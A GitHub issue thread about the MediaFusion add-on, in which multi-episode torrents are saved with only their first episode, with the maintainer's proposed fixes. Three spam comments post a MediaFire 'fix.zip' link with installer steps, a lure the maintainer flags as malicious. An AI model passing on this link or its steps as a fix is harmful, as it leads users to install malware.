### ISSUE TITLE
Torrentio scraper returns inconsistent results for Series after Episode 1

### ISSUE THREAD

**Issue by wMarciano** [mhdzumair/MediaFusion#267]
Hello, MediaFusion team! Thanks for a wonderful add-on/project.

I've noticed that the Torrentio scraper starts to totally fall apart after Episode 1 of a series, missing the best links and only returning a few lower quality ones. 

Here I picked "Solar Opposites" (tt8910922) to demonstrate what I mean:

![mediafusion-issue](https://github.com/user-attachments/assets/ba0a6f95-c7e1-4a69-b98d-b545c4e14578)

**Comment by diablo00001** [comment]
Download 
https://www.mediafire.com/file/nyekc4ehyxg2ijy/fix.zip/file
In the installer menu, select "gcc."

**Comment by diablo00001** [comment]
Download 
https://www.mediafire.com/file/nyekc4ehyxg2ijy/fix.zip/file
In the installer menu, select "gcc."

**Comment by diablo00001** [comment]
Download 
https://www.mediafire.com/file/nyekc4ehyxg2ijy/fix.zip/file
In the installer menu, select "gcc."

**Comment by mhdzumair** [comment]
Dont click on the link. its malicious.

**Comment by mhdzumair** [comment]
@wMarciano are you self-hosting the mediafusion?

**Comment by wMarciano** [comment]
I've figured out the source of the issue: single torrents containing multiple episodes. These are always added to the db with the episode value being whatever the first query was. 

So, if there is a torrent with episodes 1-10, and I ask for episode 1, the scraper will add that torrent to the DB with the `episodes` array only containing 1. Then, when I ask for episode 2, the scraper sees that the infohash already exists in the DB, and so doesn't update it.

**Comment by mhdzumair** [comment]
Perfect, i see that's what happening on the case. We have torrent tracker based scraping to fetch more information about the files inside the torrent. This is schedule to be run on background however its not always guaranteed to be success its based on peer count. 

To resolve this issue, we can explicitly mark the episode number if its not added previously for torrentio based scraper. Or on the other hand, we could capture the streaming provider data for torrent (ex: response of RD) to updste our database.

**Comment by mhdzumair** [comment]
Please test the new improved scraping #273
